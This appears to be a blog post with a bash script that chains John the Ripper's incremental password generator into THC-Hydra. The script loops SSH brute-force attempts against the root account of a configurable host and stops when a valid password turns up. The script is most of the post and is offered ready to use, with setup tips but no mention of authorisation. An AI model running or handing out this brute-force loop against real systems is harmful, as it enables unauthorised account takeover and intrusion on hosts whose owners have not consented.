THC-Hydra password bruteforcing with john the ripper

1. Introduction

You probably already known THC-Hydra. Hydra is a brute-force password cracker, supporting a lot of protocols/services.

The only problem you could have with Hydra is : Hydra don’t digest huge lists of passwords. The reason is that Hydra will first try to load your password file into memory (RAM) before start the brute-force attack. And so, you are limited by your memory size.

It’s OK with an usual password dictionary, but you could want more. Something like passwords list generated by “John the ripper” (John provides greats way to generate passwords: digit/alpha/special chars only,  “rules” options, “external” filters, etc.)

Our goal is to use the output of John the ripper with Hydra.

The method is trivial but does the job.

loop
    (1) Generate random passwords with John the Ripper
    in a file durring few seconds (file grow up
    very quickly). Keep a john's session file.

    (2) Run hydra with the passwords file.

    (3) If found, exit. if not, continue the session
    created in (1).
end loop

2. The script

This is the bash script I wrote to perform the task.

• Review ‘hydra_*‘ variables (if need run ‘hydra –help’). See: ‘hydra_host‘, ‘hydra_port‘, ‘hydra_module‘, … and maybe ‘hydra_all_params‘.
• Review ‘john_*‘ variables. See: ‘john_all_params‘ and choose your template : (–incremental:All , –incremental:Digits , –incremental:Alpha , –single, –rules …) see john.conf file to get the list.

Enjoy!

Get hydra-john.sh

#!/bin/sh

hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20   # time (seconds) to run john

tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"

if [ "$1" = "" ];then
	echo "Usage: $0 <john session file>"
	exit 0
fi

#for lfile in `ls $loginfiles*`;do

while [ 1 ];do
	# generate some password with john the ripper
	echo; echo "- Start (re)generating passwords with John"
	if [ -e "$john_sessionfile.rec" ];then
		# if session exist, restore it
		$john --restore=$john_sessionfile  > $tmp_passwd &
	else
		# if session not exist yet, create it
		$john $john_all_params --session=$john_sessionfile > $tmp_passwd &
	fi

	# wait 100 seconds, then kill john and start hydra on it
	echo "- Wait ..."
	sleep $john_time_step
	echo "- Kill john"
	killall john 2>/dev/null 1>/dev/null
	sleep 1

	# start hydra
	echo; echo "- Start hydra"; echo

	rm -f $hydra_logfile
	echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
	$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile

	# if a valid pair has been found, stop the loop
	if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then
		echo; echo "FOUND !!"
		grep $hydra_module $hydra_logfile | grep -v DATA
		exit 0
	fi

done

Note: There is a rating embedded within this post, please visit this post to rate it.

© 2010 – 2011, foip. All rights reserved.